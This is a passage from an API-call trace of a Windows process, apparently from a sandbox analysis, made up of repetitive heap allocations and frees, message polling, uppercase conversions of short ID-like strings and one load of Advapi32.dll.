0x34aa400 [0253.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0253.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.618] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.619] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0253.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0253.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0253.619] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0253.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0253.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.620] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0253.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0253.621] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0253.621] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0253.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.621] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9b8 [0253.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.621] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0253.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.622] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0253.623] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0253.623] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0253.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0253.625] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0253.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.627] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0253.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0253.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.627] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0253.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.628] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.628] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0253.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0253.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8b0 [0253.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0253.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0253.629] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0253.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0253.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0253.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0253.630] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0253.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0253.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0253.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0253.631] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0253.631] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0253.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0253.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0253.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.632] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0253.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0253.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0253.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.632] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0253.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0253.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0253.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0253.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0253.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.634] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0253.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0253.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0253.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0253.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0253.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0253.634] HeapFree (in: 